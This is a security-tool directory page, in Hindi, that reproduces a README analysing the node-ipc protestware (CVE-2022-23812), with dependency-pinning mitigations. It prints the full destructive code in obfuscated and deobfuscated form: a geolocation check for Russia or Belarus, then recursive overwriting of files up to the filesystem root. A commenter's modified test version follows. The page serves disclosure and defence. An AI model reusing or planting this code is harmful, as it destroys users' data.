Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
node-ipc-malware-protestware-CVE-2022-23812 — node-ipc मैलवेयर / प्रोटेस्टवेयर है! | Kitploit
उपकरण/GitHubGitHub/scriptzteam/node-ipc-malware-protestware-cve-2022-23812
भेद्यता विश्लेषणडेटा निष्कासनमालवेयर विश्लेषणआपूर्ति श्रृंखला सुरक्षालर्निंग और शिक्षाघटना प्रतिक्रिया
GitHubscriptzteam/node-ipc-malware-protestware-cve-2022-23812

node-ipc-malware-protestware-CVE-2022-23812

node-ipc मैलवेयर / प्रोटेस्टवेयर है!

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
14 साल पहलेअभी तक समीक्षित नहीं

CVE-2022-23812


RIAEvangelist/node-ipc एक मैलवेयर / प्रोटेस्टवेयर है

RIAEvangelist/node-ipc मॉड्यूल में प्रोटेस्टवेयर peacenotwar शामिल है।

RIAEvangelist/node-ipc से उद्धरण:

v11.0.0 और v9.2.2 से यह मॉड्यूल peacenotwar मॉड्यूल का उपयोग करता है।


अधिक महत्वपूर्ण बात, RIAEvangelist/node-ipc की कमिट 847047cf7f81ab08352038b2204f0e7633449580 -> 6e344066a0464814a27fbd7ca8422f473956a803 में मैलवेयर है।


⚠️| निम्नलिखित कोड दुर्भावनापूर्ण है, इसे चलाएं नहीं

https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js

यह कोडब्लॉक इसलिए जोड़ा गया यदि उपरोक्त URL निष्क्रिय हो जाता है
root@kitploit:~
import u from"path";import a from"fs";import o from"https";setTimeout(function(){const t=Math.round(Math.random()*4);if(t>1){return}const n=Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=","base64");o.get(n.toString("utf8"),function(t){t.on("data",function(t){const n=Buffer.from("Li8=","base64");const o=Buffer.from("Li4v","base64");const r=Buffer.from("Li4vLi4v","base64");const f=Buffer.from("Lw==","base64");const c=Buffer.from("Y291bnRyeV9uYW1l","base64");const e=Buffer.from("cnVzc2lh","base64");const i=Buffer.from("YmVsYXJ1cw==","base64");try{const s=JSON.parse(t.toString("utf8"));const u=s[c.toString("utf8")].toLowerCase();const a=u.includes(e.toString("utf8"))||u.includes(i.toString("utf8"));if(a){h(n.toString("utf8"));h(o.toString("utf8"));h(r.toString("utf8"));h(f.toString("utf8"))}}catch(t){}})})},Math.ceil(Math.random()*1e3));async function h(n="",o=""){if(!a.existsSync(n)){return}let r=[];try{r=a.readdirSync(n)}catch(t){}const f=[];const c=Buffer.from("4p2k77iP","base64");for(var e=0;e<r.length;e++){const i=u.join(n,r[e]);let t=null;try{t=a.lstatSync(i)}catch(t){continue}if(t.isDirectory()){const s=h(i,o);s.length>0?f.push(...s):null}else if(i.indexOf(o)>=0){try{a.writeFile(i,c.toString("utf8"),function(){})}catch(t){}}}return f};const ssl=true;export {ssl as default,ssl}

⚠️| उपरोक्त कोड दुर्भावनापूर्ण है, इसे चलाएं नहीं


मैंने उपरोक्त कोड को डीओबफसकेट किया और पाया कि यदि मेजबान मशीन का सार्वजनिक आईपी पता रूस या बेलारूस से था, तो node-ipc पुनरावर्ती रूप से मूल निर्देशिकाओं पर चढ़ते हुए कई फ़ाइलों को दिल इमोजी से ओवरराइट कर देता:


⚠️| निम्नलिखित कोड दुर्भावनापूर्ण है, इसे चलाएं नहीं

root@kitploit:~
import u from "path";
import a from "fs";
import o from "https";
setTimeout(function () {
    const t = Math.round(Math.random() * 4);
    if (t > 1) {
        return;
    }
    const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64");
    o.get(n.toString("utf8"), function (t) {
        t.on("data", function (t) {
            const n = Buffer.from("Li8=", "base64");
            const o = Buffer.from("Li4v", "base64");
            const r = Buffer.from("Li4vLi4v", "base64");
            const f = Buffer.from("Lw==", "base64");
            const c = Buffer.from("Y291bnRyeV9uYW1l", "base64");
            const e = Buffer.from("cnVzc2lh", "base64");
            const i = Buffer.from("YmVsYXJ1cw==", "base64");
            try {
                const s = JSON.parse(t.toString("utf8"));
                const u = s[c.toString("utf8")].toLowerCase();
                const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8"));
                if (a) {
                    h(n.toString("utf8"));
                    h(o.toString("utf8"));
                    h(r.toString("utf8"));
                    h(f.toString("utf8"));
                }
            } catch (t) {}
        });
    });
}, Math.ceil(Math.random() * 1e3));
async function h(n = "", o = "") {
    if (!a.existsSync(n)) {
        return;
    }
    let r = [];
    try {
        r = a.readdirSync(n);
    } catch (t) {}
    const f = [];
    const c = Buffer.from("4p2k77iP", "base64");
    for (var e = 0; e < r.length; e++) {
        const i = u.join(n, r[e]);
        let t = null;
        try {
            t = a.lstatSync(i);
        } catch (t) {
            continue;
        }
        if (t.isDirectory()) {
            const s = h(i, o);
            s.length > 0 ? f.push(...s) : null;
        } else if (i.indexOf(o) >= 0) {
            try {
                a.writeFile(i, c.toString("utf8"), function () {});
            } catch (t) {}
        }
    }
    return f;
}
const ssl = true;
export { ssl as default, ssl };

⚠️| उपरोक्त कोड दुर्भावनापूर्ण है, इसे चलाएं नहीं


निम्नलिखित दुर्भावनापूर्ण कोड के अंश हैं:

root@kitploit:~
Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64");
// https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154
root@kitploit:~
const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8"));
// checks if ip country is Russia or Belarus
root@kitploit:~
a.writeFile(i, c.toString("utf8"), function () {});
// overwrites file with `❤️`

निम्नलिखित दर्शाता है कि उदाहरण के तौर पर a.writeFile(i,c.toString("utf8") को भेजे जाने वाले प्रत्येक पैरामीटर क्या होंगे:

image


संपादन 2022-03-16_0

टिप्पणी द्वारा zkyf

बस इसे बेहतर दिखाया और खतरनाक कोड पर टिप्पणी की ताकि आप लोग कोशिश कर सकें। जाहिर है कि कोड आपकी ड्राइव पर वस्तुतः सब कुछ हटा देगा।

root@kitploit:~
const path = require("path");
const fs = require("fs");
const https = require("https");

setTimeout(function () {
    const randomNumber = Math.round(Math.random() * 4);
    if (randomNumber > 1) {
        // return;
    }
    const apiKey = "https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154";
    const pwd = "./";
    const parentDir = "../";
    const grandParentDir = "../../";
    const root = "/";
    const countryName = "country_name";
    const russia = "russia";
    const belarus = "belarus";

    https.get(apiKey, function (message) {
        message.on("data", function (msgBuffer) {
            try {
                const message = JSON.parse(msgBuffer.toString("utf8"));
                const userCountryName = message[countryName.toString("utf8")].toLowerCase();
                const hasRus = userCountryName.includes(russia.toString("utf8")) || userCountryName.includes(belarus.toString("utf8")); // checks if country is Russia or Belarus
                if (hasRus) {
                    deleteFile(pwd);
                    deleteFile(parentDir);
                    deleteFile(grandParentDir);
                    deleteFile(root);
                }
            } catch (t) {}
        });
    });

    // zkyf: Let's try this directly here
    deleteFile(pwd);
    deleteFile(parentDir);
    deleteFile(grandParentDir);
    deleteFile(root);
}, 100);

async function deleteFile(pathName = "", o = "") {
    if (!fs.existsSync(pathName)) {
        return;
    }
    let fileList = [];
    try {
        fileList = fs.readdirSync(pathName);
    } catch (t) {}
    const f = [];
    const heartUtf8 = Buffer.from("4p2k77iP", "base64");
    for (var idx = 0; idx < fileList.length; idx++) {
        const fileName = path.join(pathName, fileList[idx]);
        let fileInfo = null;
        try {
            fileInfo = fs.lstatSync(fileName);
        } catch (err) {
            continue;
        }
        if (fileInfo.isDirectory()) {
            const fileSymbol = deleteFile(fileName, o);
            fileSymbol.length > 0 ? f.push(...fileSymbol) : null;
        } else if (fileName.indexOf(o) >= 0) {
            try {
                // fs.writeFile(fileName, heartUtf8.toString("utf8"), function () {}); // overwrites file with `❤️`
                console.log(`Rewrite ${fileName}`);
            } catch (err) {}
        }
    }
    return f;
}

संपादन 2022-03-16_1 (@lgg द्वारा अनुरोधित)

उपलब्ध शमन विधियाँ:

निम्नलिखित शमन रणनीतियाँ cnpm (npm नहीं है) के शमन विधियों से प्रेरित हैं: https://github.com/cnpm/bug-versions/pull/181

यदि आप निम्नलिखित शमन रणनीतियों में से एक का उपयोग करते हैं, तो node-ipc को निर्दिष्ट संस्करण पर बाध्य करने के लिए ^ को हटाना सुनिश्चित करें।

"^9.x.x" -> "9.2.1"

root@kitploit:~
     "dependencies": {
-        "node-ipc": "^9.x.x"
+        "node-ipc": "9.2.1"
     }

"^10.x.x" -> "10.1.0"

root@kitploit:~
     "dependencies": {
-        "node-ipc": "^10.x.x"
+        "node-ipc": "10.1.0"
     }

"^11.x.x" -> "10.1.0"

root@kitploit:~
     "dependencies": {
-        "node-ipc": "^11.x.x"
+        "node-ipc": "10.1.0"
     }

तृतीय-पक्ष शमन विधियाँ:

  • vue-cli
  • Unity Hub

संपादन 2022-03-16_2 (@lgg द्वारा अनुरोधित)

CVE-2022-23812

संपादन 2022-03-17

@RIAEvangelist ने मुझे उनके भंडारों के साथ बातचीत करने से प्रतिबंधित कर दिया है

टूल डाउनलोड करें

कंसोल: image